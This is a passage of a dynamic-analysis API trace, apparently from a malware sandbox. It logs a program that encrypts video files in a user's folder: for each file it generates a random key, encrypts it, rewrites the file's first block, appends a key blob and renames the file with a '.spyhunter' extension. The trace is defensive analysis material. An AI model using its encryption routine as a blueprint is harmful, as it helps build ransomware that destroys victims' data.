pdwDataLen=0x248f068*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f068*=0x30) returned 1 [0147.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\051LABMUVIFXk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\051labmuvifxk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\051LABMUVIFXk.mkv") returned 92 [0147.370] StrStrW (lpFirst="051LABMUVIFXk.mkv", lpSrch=".txt") returned 0x0 [0147.371] GetProcessHeap () returned 0x2c0000 [0147.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.371] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f02c*=0x2800, lpOverlapped=0x0) returned 1 [0147.371] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.371] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f02c*=0x2800, lpOverlapped=0x0) returned 1 [0147.372] GetProcessHeap () returned 0x2c0000 [0147.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.372] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.372] WriteFile (in: hFile=0xa0, lpBuffer=0x248f06c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x248f06c*, lpNumberOfBytesWritten=0x248f02c*=0x4, lpOverlapped=0x0) returned 1 [0147.372] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f02c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f02c*=0x30, lpOverlapped=0x0) returned 1 [0147.372] CloseHandle (hObject=0xa0) returned 1 [0147.372] GetProcessHeap () returned 0x2c0000 [0147.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.374] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\051LABMUVIFXk.mkv.spyhunter") returned 102 [0147.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\051LABMUVIFXk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\051labmuvifxk.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\whSxp12p1aXi\\051LABMUVIFXk.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\whsxp12p1axi\\051labmuvifxk.mkv.spyhunter")) returned 1 [0147.375] GetProcessHeap () returned 0x2c0000 [0147.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.375] GetProcessHeap () returned 0x2c0000 [0147.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.375] GetProcessHeap () returned 0x2c0000 [0147.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62068 | out: hHeap=0x2c0000) returned 1 [0147.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f068 | out: pbBuffer=0x248f068) returned 1 [0147.375] GetProcessHeap () returned 0x2c0000 [0147.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f060*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f060*=0x30) returned 1 [0147.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\ev09uxoNQ2HSwd.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\ev09uxonq2hswd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.376] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\ev09uxoNQ2HSwd.avi") returned 80 [0147.376] StrStrW (lpFirst="ev09uxoNQ2HSwd.avi", lpSrch=".txt") returned 0x0 [0147.376] GetProcessHeap () returned 0x2c0000 [0147.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.376] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f024*=0x2800, lpOverlapped=0x0) returned 1 [0147.377] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.377] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f024*=0x2800, lpOverlapped=0x0) returned 1 [0147.377] GetProcessHeap () returned 0x2c0000 [0147.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.377] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.377] WriteFile (in: hFile=0xa0, lpBuffer=0x248f064*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x248f064*, lpNumberOfBytesWritten=0x248f024*=0x4, lpOverlapped=0x0) returned 1 [0147.377] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f024*=0x30, lpOverlapped=0x0) returned 1 [0147.377] CloseHandle (hObject=0xa0) returned 1 [0147.378] GetProcessHeap () returned 0x2c0000 [0147.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.378] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\ev09uxoNQ2HSwd.avi.spyhunter") returned 90 [0147.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\ev09uxoNQ2HSwd.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\ev09uxonq2hswd.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\ev09uxoNQ2HSwd.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\ev09uxonq2hswd.avi.spyhunter")) returned 1 [0147.379] GetProcessHeap () returned 0x2c0000 [0147.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.379] GetProcessHeap () returned 0x2c0000 [0147.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.379] GetProcessHeap () returned 0x2c0000 [0147.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64a88 | out: hHeap=0x2c0000) returned 1 [0147.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f068 | out: pbBuffer=0x248f068) returned 1 [0147.379] GetProcessHeap () returned 0x2c0000 [0147.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f060*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f060*=0x30) returned 1 [0147.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\BTvJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\btvj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\BTvJ.mkv") returned 70 [0147.379] StrStrW (lpFirst="BTvJ.mkv", lpSrch=".txt") returned 0x0 [0147.380] GetProcessHeap () returned 0x2c0000 [0147.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.380] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f024*=0x2800, lpOverlapped=0x0) returned 1 [0147.380] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.380] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f024*=0x2800, lpOverlapped=0x0) returned 1 [0147.381] GetProcessHeap () returned 0x2c0000 [0147.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.381] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.381] WriteFile (in: hFile=0xa0, lpBuffer=0x248f064*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x248f064*, lpNumberOfBytesWritten=0x248f024*=0x4, lpOverlapped=0x0) returned 1 [0147.381] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f024, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f024*=0x30, lpOverlapped=0x0) returned 1 [0147.381] CloseHandle (hObject=0xa0) returned 1 [0147.381] GetProcessHeap () returned 0x2c0000 [0147.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.381] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\BTvJ.mkv.spyhunter") returned 80 [0147.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\BTvJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\btvj.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\BTvJ.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\btvj.mkv.spyhunter")) returned 1 [0147.390] GetProcessHeap () returned 0x2c0000 [0147.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.390] GetProcessHeap () returned 0x2c0000 [0147.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.390] GetProcessHeap () returned 0x2c0000 [0147.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee5a8 | out: hHeap=0x2c0000) returned 1 [0147.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f060 | out: pbBuffer=0x248f060) returned 1 [0147.390] GetProcessHeap () returned 0x2c0000 [0147.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f058*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f058*=0x30) returned 1 [0147.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\6ASTGn9NPKxvuM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\6astgn9npkxvum.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.391] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\6ASTGn9NPKxvuM.swf") returned 80 [0147.391] StrStrW (lpFirst="6ASTGn9NPKxvuM.swf", lpSrch=".txt") returned 0x0 [0147.391] GetProcessHeap () returned 0x2c0000 [0147.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.435] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f01c*=0x2800, lpOverlapped=0x0) returned 1 [0147.436] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.436] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f01c*=0x2800, lpOverlapped=0x0) returned 1 [0147.436] GetProcessHeap () returned 0x2c0000 [0147.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.436] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.436] WriteFile (in: hFile=0xa0, lpBuffer=0x248f05c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x248f05c*, lpNumberOfBytesWritten=0x248f01c*=0x4, lpOverlapped=0x0) returned 1 [0147.436] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f01c*=0x30, lpOverlapped=0x0) returned 1 [0147.437] CloseHandle (hObject=0xa0) returned 1 [0147.437] GetProcessHeap () returned 0x2c0000 [0147.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.437] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\6ASTGn9NPKxvuM.swf.spyhunter") returned 90 [0147.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\6ASTGn9NPKxvuM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\6astgn9npkxvum.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\6ASTGn9NPKxvuM.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\6astgn9npkxvum.swf.spyhunter")) returned 1 [0147.438] GetProcessHeap () returned 0x2c0000 [0147.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.438] GetProcessHeap () returned 0x2c0000 [0147.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.438] GetProcessHeap () returned 0x2c0000 [0147.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64998 | out: hHeap=0x2c0000) returned 1 [0147.438] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f060 | out: pbBuffer=0x248f060) returned 1 [0147.438] GetProcessHeap () returned 0x2c0000 [0147.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.438] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f058*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f058*=0x30) returned 1 [0147.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\54LJAv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\54ljav.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\54LJAv.flv") returned 72 [0147.439] StrStrW (lpFirst="54LJAv.flv", lpSrch=".txt") returned 0x0 [0147.439] GetProcessHeap () returned 0x2c0000 [0147.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.439] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f01c*=0x2800, lpOverlapped=0x0) returned 1 [0147.440] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.440] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f01c*=0x2800, lpOverlapped=0x0) returned 1 [0147.440] GetProcessHeap () returned 0x2c0000 [0147.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.440] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.440] WriteFile (in: hFile=0xa0, lpBuffer=0x248f05c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x248f05c*, lpNumberOfBytesWritten=0x248f01c*=0x4, lpOverlapped=0x0) returned 1 [0147.441] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f01c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f01c*=0x30, lpOverlapped=0x0) returned 1 [0147.441] CloseHandle (hObject=0xa0) returned 1 [0147.441] GetProcessHeap () returned 0x2c0000 [0147.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.441] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\54LJAv.flv.spyhunter") returned 82 [0147.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\54LJAv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\54ljav.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\RHYQLhZNWKAn8P3\\54LJAv.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\rhyqlhznwkan8p3\\54ljav.flv.spyhunter")) returned 1 [0147.442] GetProcessHeap () returned 0x2c0000 [0147.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.442] GetProcessHeap () returned 0x2c0000 [0147.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.442] GetProcessHeap () returned 0x2c0000 [0147.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb58f8 | out: hHeap=0x2c0000) returned 1 [0147.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f058 | out: pbBuffer=0x248f058) returned 1 [0147.442] GetProcessHeap () returned 0x2c0000 [0147.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.442] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f050*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f050*=0x30) returned 1 [0147.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\96XVM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\96xvm.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.443] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\96XVM.avi") returned 55 [0147.443] StrStrW (lpFirst="96XVM.avi", lpSrch=".txt") returned 0x0 [0147.443] GetProcessHeap () returned 0x2c0000 [0147.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.443] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f014*=0x2800, lpOverlapped=0x0) returned 1 [0147.444] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.444] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f014*=0x2800, lpOverlapped=0x0) returned 1 [0147.444] GetProcessHeap () returned 0x2c0000 [0147.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.444] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.444] WriteFile (in: hFile=0xa0, lpBuffer=0x248f054*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x248f054*, lpNumberOfBytesWritten=0x248f014*=0x4, lpOverlapped=0x0) returned 1 [0147.445] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f014*=0x30, lpOverlapped=0x0) returned 1 [0147.445] CloseHandle (hObject=0xa0) returned 1 [0147.445] GetProcessHeap () returned 0x2c0000 [0147.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.445] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\96XVM.avi.spyhunter") returned 65 [0147.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\96XVM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\96xvm.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\96XVM.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\96xvm.avi.spyhunter")) returned 1 [0147.446] GetProcessHeap () returned 0x2c0000 [0147.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.446] GetProcessHeap () returned 0x2c0000 [0147.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.446] GetProcessHeap () returned 0x2c0000 [0147.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2ce0 | out: hHeap=0x2c0000) returned 1 [0147.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f058 | out: pbBuffer=0x248f058) returned 1 [0147.446] GetProcessHeap () returned 0x2c0000 [0147.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, 